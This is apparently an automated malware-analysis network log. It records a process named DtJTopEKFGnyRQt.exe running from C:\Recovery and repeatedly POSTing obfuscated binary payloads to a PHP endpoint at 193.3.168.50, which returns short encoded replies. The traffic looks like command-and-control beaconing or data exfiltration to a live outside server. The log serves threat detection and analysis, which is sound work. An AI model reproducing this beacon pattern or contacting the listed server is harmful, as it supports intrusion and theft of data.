Dec 4, 2024 15:46:59.296904087 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 25 5e 33 5d 24 52 26 3c 23 56 29 23 2c 12 39 0a 3f 5a 25 3e 2d 42 31 14 3b 1e 29 3a 3f 5d 21 5b 32 11 2b 07 24 0d 28 34 20 57 3d 38 20 58 00 1a 25 00 37 0b 3c 1e 2e 5f 34 5b 26 5b 2d 05 24 03 29 5b 3d 2a 33 56 29 33 3b 0e 26 3d 22 53 2a 30 3d 53 3b 24 2d 16 2d 00 31 00 25 3f 2a 52 0e 17 21 1a 2a 00 09 02 34 0f 35 54 29 1f 23 5d 3f 11 0e 0c 24 38 26 16 34 07 39 1f 24 09 3e 0e 33 0c 0c 54 27 06 02 03 24 2f 23 04 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%^3]$R&<#V)#,9?Z%>-B1;):?]![2+$(4 W=8 X%7<._4[&[-$)[=3V)3;&="S0=S;$--1%?R!45T)#]?$8&49$>3T'$/#)) _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49943	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:00.036689997 CET	388	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 4, 2024 15:47:00.386781931 CET	1012	OUT	Data Raw: 5f 5b 5f 5c 59 5a 5f 52 5a 58 51 52 55 51 5a 5e 50 54 5d 5d 59 5a 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _[_\YZ_RZXQRUQZ^PT]]YZWH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-8 X=)$Y !;, 94-3$$T "%^$>/60(R*-#G $],=
Dec 4, 2024 15:47:01.274624109 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:01.509145975 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49946	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:01.769382954 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:02.242310047 CET	1012	OUT	Data Raw: 5f 50 5f 5b 59 5a 5a 5f 5a 58 51 52 55 50 5a 52 50 52 5d 5e 59 5b 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _P_[YZZ_ZXQRUPZRPR]^Y[WH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY._/3&(;#%&Z,,&!?. $3?8490>68W=-#G $],
Dec 4, 2024 15:47:02.995022058 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:03.233683109 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49952	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:03.473543882 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:03.821418047 CET	1012	OUT	Data Raw: 5a 59 5f 53 59 5c 5a 52 5a 58 51 52 55 52 5a 5e 50 51 5d 5f 59 58 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZY_SY\ZRZXQRURZ^PQ]_YXWE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.[- _+93!6>,2 :#9 ;$ !90<C" (=#G $],1
Dec 4, 2024 15:47:04.978110075 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:05.213659048 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49953	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:04.555078983 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:47:05.252882957 CET	1888	OUT	Data Raw: 5f 5f 5a 5b 5c 5c 5f 50 5a 58 51 52 55 5f 5a 58 50 55 5d 58 59 52 57 43 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: __Z[\\_PZXQRU_ZXPU]XYRWC^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-86?9 76/)Y4) ,#'\'/416$@608S(-#G $],
Dec 4, 2024 15:47:05.829642057 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:06.064789057 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 25 59 33 3b 3c 57 27 2c 01 53 2b 33 0e 59 2c 20 24 02 30 3d 3e 18 27 2a 0d 57 29 14 2c 03 35 03 00 5d 3c 07 05 56 2b 09 24 15 2a 02 20 58 00 1a 26 17 37 0c 38 5c 39 2a 30 5a 24 3d 0b 05 30 3e 25 5c 28 29 3c 0a 29 0d 16 10 25 58 3a 52 3d 0d 07 18 2f 24 25 5f 2e 00 32 5d 32 05 2a 52 0e 17 22 0a 3d 2e 2f 03 37 0f 39 1e 3d 0f 27 1b 2b 59 2c 0e 33 28 00 16 34 3e 39 54 25 33 3a 0f 33 0c 35 0a 27 28 02 06 32 11 2c 5a 29 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Y3;<W',S+3Y, $0=>'W),5]<V+$ X&78\90Z$=0>%\()<)%X:R=/$%_.2]2R"=./79='+Y,3(4>9T%3:35'(2,Z) _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49959	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:05.667756081 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:06.024686098 CET	1012	OUT	Data Raw: 5f 5f 5f 5f 5c 5b 5f 54 5a 58 51 52 55 50 5a 5e 50 51 5d 5c 59 5b 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ____\[_TZXQRUPZ^PQ]\Y[WG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^809]=9$#&Z.?!\79S- +$<0#1:0=#"U=#G $],
Dec 4, 2024 15:47:06.937036991 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:07.156864882 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49963	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:07.505373001 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:08.170727015 CET	1012	OUT	Data Raw: 5f 51 5a 58 5c 5e 5a 51 5a 58 51 52 55 55 5a 5d 50 57 5d 5f 59 5c 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _QZX\^ZQZXQRUUZ]PW]_Y\WF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Y;+$Z %9//!Z#_4.;\$V7*'-;" W)=#G $],-
Dec 4, 2024 15:47:08.687726021 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:08.930723906 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49969	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:09.194298029 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:09.540318012 CET	1012	OUT	Data Raw: 5f 51 5f 59 5c 5a 5a 5e 5a 58 51 52 55 51 5a 59 50 54 5d 5c 59 5e 57 44 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Q_Y\ZZ^ZXQRUQZYPT]\Y^WD^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.,!^()$4&8= 979($<04!Y0-/6V>=#G $],=
Dec 4, 2024 15:47:10.432779074 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:10.668953896 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49975	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:11.727811098 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:47:12.087038040 CET	1888	OUT	Data Raw: 5f 58 5f 5b 5c 5a 5a 5e 5a 58 51 52 55 56 5a 5c 50 53 5d 59 59 5c 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _X_[\ZZ^ZXQRUVZ\PS]YY\W@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.,^?*8[4%%//1Z 9'Z3Z W!26$$B5V7(=#G $],!
Dec 4, 2024 15:47:12.946681976 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:13.184583902 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 02 24 15 20 55 30 05 27 53 3f 33 2c 1c 39 20 3f 5a 24 58 2d 09 31 3a 37 11 2a 5c 2f 11 21 5b 29 02 2b 39 3b 57 2b 37 02 18 28 38 20 58 00 1a 25 01 21 32 33 02 3a 17 02 5d 26 04 2e 5f 24 5b 25 5d 28 2a 23 51 29 1d 3f 0f 26 2e 2d 08 29 33 2a 0b 3b 1a 35 1b 2e 3d 36 1b 26 05 2a 52 0e 17 21 52 3e 3e 24 11 23 31 3e 0e 2a 0f 01 5c 3f 11 2b 54 27 01 22 18 20 2d 36 0d 30 30 25 55 27 21 31 0b 27 38 27 10 26 2f 2b 05 3d 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&$ U0'S?3,9 ?Z$X-1:7\/![)+9;W+7(8 X%!23:]&._$[%](#Q)?&.-)3;5.=6&R!R>>$#1>*\?+T'" -600%U'!1'8'&/+= _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49976	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:12.016124010 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:12.381423950 CET	1012	OUT	Data Raw: 5f 58 5f 5b 59 59 5f 52 5a 58 51 52 55 51 5a 52 50 5e 5d 5a 59 5a 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _X_[YY_RZXQRUQZRP^]ZYZWB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-8 .(*44558. ) .3<%,<4"'>#"3$(-#G $],=
Dec 4, 2024 15:47:13.272970915 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:13.508744955 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49982	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:13.757244110 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:14.102680922 CET	1012	OUT	Data Raw: 5f 58 5a 5e 59 5e 5f 55 5a 58 51 52 55 51 5a 5c 50 57 5d 5d 59 53 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _XZ^Y^_UZXQRUQZ\PW]]YSW@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Z,"<)#6\;/2#8U.0<<T 2-^'>3638W)#G $],=
Dec 4, 2024 15:47:15.103055954 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:15.340948105 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49988	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:16.465801954 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1008 Expect: 100-continue
Dec 4, 2024 15:47:16.860868931 CET	1008	OUT	Data Raw: 5a 59 5f 52 59 5a 5f 53 5a 58 51 52 55 57 5a 5c 50 54 5d 53 59 5e 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZY_RYZ_SZXQRUWZ\PT]SY^WH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/#%X+:<Y 9;=] _ -40/<S =$.?57=#G $],
Dec 4, 2024 15:47:17.710314989 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:17.948257923 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49991	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:18.192924976 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:47:18.540252924 CET	1012	OUT	Data Raw: 5f 50 5a 5c 5c 5c 5a 56 5a 58 51 52 55 5f 5a 5e 50 50 5d 5a 59 59 57 49 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _PZ\\\ZVZXQRU_Z^PP]ZYYWI^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.X8)\(+76>,%\!),. 73<T 2&0.<!+)#G $],
Dec 4, 2024 15:47:19.433363914 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:47:19.668687105 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:47:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49992	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:47:18.343272924 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:47:18.696362019 CET	1888	OUT	Data Raw: 5f 5e 5f 59 5c 5c 5a 5f 5a 58 51 52 55 51 5a 5a 50 5f 5d 5e 59 5b 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _^_Y\\Z_ZXQRUQZZP_]^Y[W@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-;3>?7!6%,<!Z4(R90?0/<W!"9'>8D"##G $],=
Dec 4, 2024 15:47:19.607208967 CET	25	IN	HTTP/1.1 100 Continue
